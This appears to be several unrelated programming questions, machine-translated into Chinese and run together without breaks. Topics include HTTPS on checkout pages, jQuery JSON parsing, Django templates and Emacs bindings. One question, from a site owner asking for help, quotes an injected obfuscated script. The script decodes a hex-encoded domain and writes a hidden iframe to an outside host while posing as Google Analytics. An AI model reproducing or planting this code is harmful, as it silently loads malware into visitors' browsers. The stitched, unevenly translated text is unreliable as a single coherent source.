我的最后几个项目涉及销售产品/服务的网站,并且需要"结帐"流程,用户可以在其中输入信用卡信息等.显然,我们获得了SSL证书以确保其安全性,并让客户放心.然而,我对它的细微之处有点无能为力,最重要的是,网站的哪些部分应该"使用"证书.
例如,我去过网站,当你点击主页时,你被放入https - 主要是银行网站 - 然后有网站,当你最终退房时,你只在https.如果不处理银行业务中的某些事情,整个网站是否通过https运行是否过度?我应该只进行结账页面https吗?全力以赴的表现是什么?
$ str [n]和$ str {n}之间有什么区别,因为$ str是一个字符串.
我注意到两者似乎都是一样的,除了{}在我找到的任何文档中都没有出现.
通常键盘转义退出是绑定的EscEscEsc.有可能将它重新绑定到一个单独的Esc吗?我从不使用Escape作为前缀键.
我在Windows XP上运行Emacs 23.0.60.1.
我试图用JQuery getJSON和ajax解析以下json响应:
[{"iId":"1","heading":"Management Services","body":"<h1>Program Overview</h1><h1>January 29, 2009</h1>"}]
我也试过它像这样转义"/"字符:
[{"iId":"1","heading":"Management Services","body":"<h1>Program Overview <\/h1><h1>January 29, 2009<\/h1>"}]
当我使用getJSON时,它不会执行回调.所以,我用JQuery ajax尝试了如下:
$.ajax({
url: jURL,
contentType: "application/json; charset=utf-8",
dataType: "json",
beforeSend: function(x) {
if(x && x.overrideMimeType) {
x.overrideMimeType("application/j-son;charset=UTF-8");
}
},
success: function(data){
wId = data.iId;
$("#txtHeading").val(data.heading);
$("#txtBody").val(data.body);
$("#add").slideUp("slow");
$("#edit").slideDown("slow");
},//success
error: function (XMLHttpRequest, textStatus, errorThrown) {
alert("XMLHttpRequest="+XMLHttpRequest.responseText+"\ntextStatus="+textStatus+"\nerrorThrown="+errorThrown);
}
});
ajax命中错误并警告以下内容:
XMLHttpRequest=[{"iId":"1","heading":"Management Services","body":"<h1>Program Overview </h1><h1>January 29, 2009</h1>"}]
textStatus=parseerror
errorThrown=undefined
然后我尝试了一个简单的JQuery get调用,使用以下代码返回JSON:
$.get(jURL,function(data){
var json = eval("("+data+");");
wId = json.iId;
$("#txtHeading").val(json.heading);
$("#txtBody").val(json.body);
$("#add").slideUp("slow");
$("#edit").slideDown("slow");
})
.get返回JSON,但无论我如何修改JSON(内容类型标题,格式的其他变体等),eval都会出现错误.
我想到的是,在JSON中返回HTML并解析它似乎存在问题.但是,我希望我可能错过了一些允许我通过JSON获取此数据的内容.有没有人有任何想法?
好吧,我想这一天不得不来.
我的客户的网站已被Google妥协并列入黑名单.当你加载主页面时,这个javascript会自动添加到文档的底部:
<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>
我还没有解剖它,但很明显,这是一个试图冒充谷歌分析的攻击者.我无法理解的是,如果我从主页面中删除每个单独的HTML,那么index.html是一个空文档,javascript STILL将被嵌入.是什么赋予了?怎么可能?
更新
该网站是一个非常简单的日历应用程序,运行在10美元/月的godaddy unix帐户,MySQL,PHP.
它不是我的计算机特有的本地东西,因为我的客户端是那个用问题打电话给我的人.我家里的所有电脑也发生过(4)
我将在网络服务器上进行扫描......
来源确定
好吧,我发现了javascript的来源.我愚蠢地只清空了template.html文件,但仍然通过我的php模板系统运行脚本.显然,有些上面的代码被附加到我index.php和main.php文件的底部.这怎么可能?
更多背景:
让我先写一下我刚开始使用Python,如果这真的是一个简单的问题^ _ ^
我有一个包含以下内容的html文件:
{%for d in results%}
<div class="twt">
<img src="{{ d.profile_image_url }}" width="48px" height="48px" /> <span> {{ d.text }} </span>
<span class="date">{{ d.created_at }}</span>
</div>
{% endfor %}
哪个效果很好,但我也想在这个页面上声明一个变量.让我们说这个例子,我们可以使用RowNumber,它将为显示的每个d递增,吐出当前的RowNumber.
我试过做:
{{ RowNumber = 0}}
{{ RowNumber ++ }}
但它似乎不允许我声明RowNumber.
我有一个简单的CRUD表单.
当用户输入或删除记录时,我试图显示一个很酷的成功消息.我在网上看到了很多这个.
我对jquery很新.有谁知道任何会显示如何做到这一点的例子?
基本上是一个慢慢调暗的div.
使用ajax请求我想改变我的div的内容.
<div id="d1">202</div>
所以我想将内容更改为其他数字.
$('d1').InnerText???
另外,说我想增加数字,我怎么能这样做?我必须转换为int吗?
问题:我有一个jQuery繁重的页面,有一个内置的管理界面.admin函数仅在设置admin变量时触发.这些功能需要第二个库才能正常工作,如果用户在首次创建页面时是管理员,则仅包含第二个文件.这些功能永远不会触发普通用户,而普通用户也不会获得第二个库的包含.
引用当前包含的文件中不存在的函数是不是很糟糕,即使该函数永远不能被调用?(那有意义吗 :)
伪代码:
标题:(注意不包括admin.js)
<script type="text/javascript" src="script.js"></script>
<script type="text/javascript" src="user.js"></script>
script.js :(引用的管理函数但无法执行)
admin = false; // Assume this
$(".something").dblclick(function(){
if(admin)
adminstuff(); // Implemented in admin.js (not included)
else
userstuff();
});
想法: 我想可以使用两个单独的用户和管理员文件,但我觉得这将是一个过于复杂的解决方案(不想维护两个只有几行差异的大文件).我在此文件中包含对admin函数的引用的唯一原因是我需要将它附加到作为脚本一部分刷新的页面元素.当jQuery刷新页面时,我需要将功能重新附加到交互元素.
问题: 我希望保持简单,如果用户不使用,则不必包含我不需要的文件.这是一个很好的方法,或者我应该走另一条路?